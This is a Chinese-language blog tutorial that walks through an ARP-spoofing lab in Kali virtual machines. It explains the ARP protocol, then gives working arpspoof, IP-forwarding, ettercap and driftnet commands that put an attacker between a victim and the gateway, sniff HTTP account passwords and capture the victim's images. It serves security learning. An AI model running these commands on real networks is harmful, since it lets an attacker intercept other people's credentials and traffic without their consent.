網路安全測試---ARP欺騙

夢醒詩者發表於2022-05-23

一. ARP欺騙

目錄

一. ARP欺騙

1. ARP協議

2. 什麼是ARP攻擊

3. 環境搭建

4. 安裝arpspoof

 5. Kali操作

6. 竊取賬號密碼

7. Driftnet安裝

8.  Driftnet引數說明

 9. Driftnet操作


1. ARP協議

ARP協議是“Address Resolution Protocol”(地址解析協議)的縮寫。我們知道在區域網中,網路以“幀”的形式傳輸資料。一個主機要和另一個主機進行直接通訊,必須要知道目標主機的MAC地址,目標主機的MAC地址理應就包含在資料幀中。顯然在雙方通訊之初,傳送方是無法知道目標MAC地址的,它的獲得就是通過地址解析這個過程。所謂“地址解析”就是主機在傳送幀前將目標IP地址轉換成目標MAC地址的過程。ARP協議的基本功能就是通過目標裝置的IP地址,查詢目標裝置的MAC地址,以保證通訊的順利進行。

2. 什麼是ARP攻擊

       ARP欺騙是一類地址欺騙類病毒,屬於木馬病毒,自身不具備主動傳播的特性,不會自我複製。但是由於其發作的時候會不斷向全網傳送偽造的ARP資料包,導致網路無法正常執行,嚴重的甚至可能帶來整個網路的癱瘓。   

      此外,黑客還會通過這種攻擊手段竊取使用者密碼,如盜取QQ密碼、盜取各種網路遊戲密碼和賬號、盜竊網上銀行賬號,給使用者造成了很大的不便和巨大的經濟損失。因此,它的危害比一些蠕蟲病毒還要厲害。     

       電腦感染ARP病毒後的表現為:網速時快時慢,極其不穩定,區域網內頻繁性區域或整體掉線,重啟計算機或網路裝置後恢復正常;網上銀行、遊戲及QQ賬號的頻繁丟失。隨著加密技術的不斷提高,ARP病毒在盜取使用者賬號、密碼時遇到了很大的難度。於是又出現了一類新的ARP病毒,該類ARP病毒保留了ARP病毒的基本功能,即向全網傳送偽造的ARP欺騙廣播,將自身偽裝成閘道器。在此基礎上,對使用者發出的HTTP請求訪問進行修改,在其中插入惡意網址連結,使用者在不知情的情況下點選這些連結時,木馬病毒就會利用系統漏洞種植到使用者電腦中,從而使使用者電腦感染病毒。

ARP攻擊圖解:

 

1. PC2 向 PC1傳送ARP協議,欺騙PC1自己是閘道器

2. PC1把流量轉向PC2

3. PC2向閘道器傳送ARP協議欺騙閘道器自己是PC1

4. 閘道器傳送響應包給PC2

5. PC2傳送響應包給PC1

閘道器IP為: 192.168.127.2                 PC1 : 192.168.127.100               PC2 : 192.168.127.200

3. 環境搭建

1. 虛擬機器內操作

2. Kali虛擬機器

3. 隨意一臺虛擬機器,最好Windows

4. 安裝arpspoof

 5. Kali操作

檢視區域網存活IP :

fping –a –g 192.168.127.x/24    -a: 顯示結果   -g:使用掩碼查詢

傳送ARP欺騙給對方主機:

arpspoof -i eth0 -t 192.168.127.172  192.168.127.2

開啟流量轉發功能,否則受害機不能上網

echo 1 > /proc/sys/net/ipv4/ip_forward

6. 竊取賬號密碼

開啟Ettercap,竊取目標主機輸入的賬號密碼(只能探嗅HTTP)

ettercap -Tq -i eth0

測試:

http://106.225.138.11:8088

7. Driftnet安裝

檢視受害主機瀏覽的圖片

apt-get install driftnet

如果出現安裝失敗等情況

請更換國內源 https://www.perfcode.com/p/kali-sources.html

8.  Driftnet引數說明

引數說明:          

-b         捕獲到新的圖片時發出嘟嘟聲          

 -i          interface     選擇監聽介面          

 -f          file   讀取一個指定pcap資料包中的圖片            

-p        不讓所監聽的介面使用混雜模式            

-a        後臺模式:將捕獲的圖片儲存到目錄中(不會顯示在螢幕上)            

-m      number 指定儲存圖片數的數目          

 -d       directory  指定儲存圖片的路徑            

-x        prefix  指定儲存圖片的字首名

 9. Driftnet操作

 ARP欺騙切換到 –T 圖片模式        

arpspoof -t 192.168.127.172 192.168.127.2 -i eth0          

儲存圖片到桌面dir:        

driftnet -i eth0 -a -d dir

 

相關文章